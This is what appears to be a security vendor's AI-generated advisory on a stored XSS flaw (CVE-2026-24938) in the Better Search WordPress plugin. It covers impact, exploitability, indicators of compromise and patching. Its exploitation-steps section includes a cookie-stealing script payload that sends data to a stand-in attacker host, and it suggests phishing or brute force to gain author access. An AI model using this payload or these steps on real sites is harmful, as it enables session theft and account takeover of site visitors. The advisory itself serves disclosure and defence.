Register for the AI for Security Summit: Join Figma, Perplexity & Wiz

CVE-2026-24938
WordPress vulnerability analysis and mitigation

Overview

CVE-2026-24938 is a Stored Cross-Site Scripting (XSS) vulnerability in the Better Search WordPress plugin by Ajay (WebberZone). It affects all versions up to and including 4.2.1, and was disclosed on February 3, 2026, with the vulnerability originally reported by researcher Peter Thaleikis on October 23, 2025. The issue carries a CVSS v3.1 base score of 5.9 (Medium) (Patchstack).

Technical details

The vulnerability is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation), a Stored XSS flaw. An authenticated user with Author-level or higher privileges can inject malicious scripts through the plugin's web interface, which are then persistently stored and executed in victims' browsers when they visit affected pages. Exploitation requires high privileges and user interaction (a victim must visit or interact with the affected page), limiting the attack surface but not eliminating risk in multi-author WordPress environments (Patchstack).

Impact

Successful exploitation allows an attacker with Author-level or higher privileges to inject persistent malicious scripts into WordPress pages served to site visitors. This can result in session hijacking, credential theft, unauthorized redirects, or delivery of malicious payloads to end users. The confidentiality, integrity, and availability impacts are each rated Low, with a changed scope indicating that the impact extends beyond the plugin itself to affect site visitors' browsers (Patchstack).

Exploitability

The EPSS score for this vulnerability is approximately 0.033% (0.000330), indicating a low probability of exploitation in the wild in the near term. No public proof-of-concept exploit code, active in-the-wild exploitation, or threat actor attribution has been reported. The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. Patchstack notes that vulnerabilities of this class are sometimes used in mass-exploit campaigns targeting WordPress sites at scale (Patchstack).

Exploitation steps

  1. Reconnaissance: Identify WordPress sites running the Better Search plugin version 4.2.1 or earlier, using tools like WPScan or Shodan with WordPress fingerprinting.
  2. Obtain Privileged Access: Acquire Author-level or higher credentials on the target WordPress site (e.g., via phishing, credential stuffing, or brute force).
  3. Inject Malicious Payload: Navigate to the Better Search plugin's settings or a content field that the plugin processes, and insert a stored XSS payload (e.g., <script>document.location='https://attacker.com/steal?c='+document.cookie</script>).
  4. Trigger Execution: Wait for a victim (site visitor or administrator) to visit the page where the injected script is rendered, causing the browser to execute the malicious JavaScript.
  5. Harvest Results: Collect stolen session cookies, credentials, or other data exfiltrated to the attacker-controlled server, potentially enabling account takeover or further site compromise (Patchstack).

Indicators of compromise

  • Logs: WordPress access logs showing POST requests to plugin settings or content endpoints from Author-level accounts containing script tags or encoded JavaScript payloads.
  • File System: Unexpected modifications to plugin-related database entries or WordPress post content containing <script> tags or obfuscated JavaScript.
  • Network: Outbound requests from site visitors' browsers to unknown external domains shortly after visiting pages rendered by the Better Search plugin, potentially indicating cookie or credential exfiltration.
  • Database: WordPress wp_options or wp_posts tables containing entries with embedded JavaScript or HTML event handlers (e.g., onerror, onload, <script>) associated with Better Search plugin settings.

Mitigation and workarounds

The vendor has released version 4.2.2 of the Better Search plugin, which patches this vulnerability. Site administrators should update to version 4.2.2 or later immediately via the WordPress plugin dashboard. Patchstack users can enable auto-update for vulnerable plugins as an additional safeguard. If immediate update is not possible, restricting Author-level and above account access, or temporarily deactivating the plugin, can reduce exposure (Patchstack).

Community reactions

The vulnerability was discovered and reported by security researcher Peter Thaleikis through Patchstack's Active Vulnerability Disclosure Program (VDP). Patchstack classified the issue as low priority with low likelihood of exploitation. No significant broader media coverage or notable community discussion has been identified beyond the Patchstack advisory (Patchstack).

Additional resources


SourceThis report was generated using AI

Related WordPress vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

CVE-2026-88788MEDIUM6.8
  • text-styler
NoNoSep 19, 2026
CVE-2026-9858MEDIUM4.3
  • wc-partial-shipment
NoYesSep 19, 2026
CVE-2026-9766MEDIUM4.3
  • empik-for-woocommerce
NoYesSep 19, 2026
CVE-2026-9613MEDIUM4.3
  • datalogics
NoYesSep 19, 2026
CVE-2026-87848LOW3.7
  • mpcx-lightbox
NoNoSep 19, 2026

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management